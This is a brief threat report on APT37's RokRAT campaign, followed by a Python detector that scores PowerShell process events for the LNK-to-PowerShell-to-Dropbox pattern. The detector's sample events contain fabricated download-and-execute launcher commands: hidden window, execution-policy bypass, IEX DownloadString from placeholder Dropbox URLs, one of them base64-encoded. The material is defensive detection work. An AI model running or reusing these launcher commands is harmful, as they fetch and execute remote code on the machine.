APT37 Utilizes RokRAT In Fileless Attacks

APT37, also known as Konni, Thallium and InkySquid, was observed targeting entities in South Korea with RokRAT, a cloud-based remote access trojan. Initial access came through spearphishing emails carrying a malicious ZIP file disguised as material from a North Korea-related research field. The threat actor hosted the malicious files on Dropbox cloud storage. The infection chain relied on LNK files and multiple PowerShell commands. APT37 has used RokRAT since at least 2017; the tool collects and exfiltrates sensitive information and downloads additional malicious files to infected systems.
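The chain described above (user opens an LNK, which launches PowerShell, which pulls the next stage from cloud storage) is something a detection engineer can score from process-creation telemetry. The following is an added example written for this page, not code from the original report or from any vendor: it scores constructed process-creation events in the spirit of Sysmon Event ID 1 (fields ParentImage, Image, CommandLine are assumed) and decodes -EncodedCommand payloads so a Dropbox URL hidden inside base64 still counts. Every URL, path and command line in the sample events is fabricated for illustration and is not an indicator from the APT37 campaign; the weights and threshold are assumptions to tune locally.

```python
"""Score PowerShell process-creation events for the LNK -> PowerShell -> cloud
download pattern. Constructed example; field names assume Sysmon Event ID 1."""
import base64
import json
import re

# The article names Dropbox as the payload host. The direct-download host is an
# assumption added here so links of both shapes are caught.
CLOUD_HOSTS = ("dropbox.com", "dropboxusercontent.com")
POWERSHELL = ("\\powershell.exe", "\\pwsh.exe")
ALERT_THRESHOLD = 3  # assumed; tune against local baseline

# Command-line traits typical of a PowerShell launcher embedded in an LNK.
LAUNCHER_FLAGS = {
    "hidden window": re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I),
    "encoded command": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "no profile": re.compile(r"-(?:nop|noprofile)\b", re.I),
    "execution policy bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
}
DOWNLOADER = re.compile(r"\b(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr|Start-BitsTransfer)\b", re.I)
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(cmd):
    """Return the UTF-16LE script behind -EncodedCommand, or '' if absent/invalid."""
    m = ENCODED.search(cmd)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(ev):
    """Return (score, reasons) for one process-creation event dict."""
    if not ev.get("Image", "").lower().endswith(POWERSHELL):
        return 0, []
    score, reasons = 0, []
    # explorer.exe as parent is what a double-clicked LNK looks like in telemetry.
    if ev.get("ParentImage", "").lower().endswith("\\explorer.exe"):
        score += 1
        reasons.append("spawned by explorer.exe (consistent with a double-clicked LNK)")
    cmd = ev.get("CommandLine", "")
    for name, pattern in LAUNCHER_FLAGS.items():
        if pattern.search(cmd):
            score += 1
            reasons.append(name)
    # Scan the visible command line plus the decoded -EncodedCommand body so an
    # encoded launcher cannot hide the downloader or the cloud URL.
    body = cmd + "\n" + decode_encoded_command(cmd)
    if DOWNLOADER.search(body):
        score += 1
        reasons.append("download primitive")
    for host in URL_HOST.findall(body):
        if host.lower().endswith(CLOUD_HOSTS):
            score += 2
            reasons.append("cloud storage URL (%s)" % host)
            break
    return score, reasons


def detect(lines):
    """Parse JSON-per-line events and return alerts at or above the threshold."""
    alerts = []
    for idx, line in enumerate(lines):
        score, reasons = score_event(json.loads(line))
        if score >= ALERT_THRESHOLD:
            alerts.append({"index": idx, "score": score, "reasons": reasons})
    return alerts


# Constructed sample events (fabricated hosts, paths and commands).
_PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/placeholder/stage2?dl=1')"
_ENCODED = base64.b64encode(_STAGE2.encode("utf-16-le")).decode()
SAMPLE_LINES = [
    json.dumps({"ParentImage": "C:\\Windows\\explorer.exe", "Image": _PS,
                "CommandLine": "powershell.exe -w hidden -nop -ep bypass -c \"IEX (New-Object Net.WebClient)"
                               ".DownloadString('https://dl.dropboxusercontent.com/s/placeholder/stage2.txt')\""}),
    json.dumps({"ParentImage": "C:\\Windows\\explorer.exe", "Image": _PS,
                "CommandLine": "powershell.exe -enc " + _ENCODED}),
    json.dumps({"ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": _PS,
                "CommandLine": "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1"}),
    json.dumps({"ParentImage": "C:\\Windows\\explorer.exe", "Image": _PS,
                "CommandLine": "\"" + _PS + "\""}),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LINES):
        print(alert)
```

The two malicious samples score 7 and 5 and alert; the scheduled script and the interactive shell each score 1 and stay quiet. The weights deliberately put most of the signal on the combination (explorer parent, launcher flags, download primitive, cloud-storage host) rather than on any one trait, since each trait alone is common in legitimate administration.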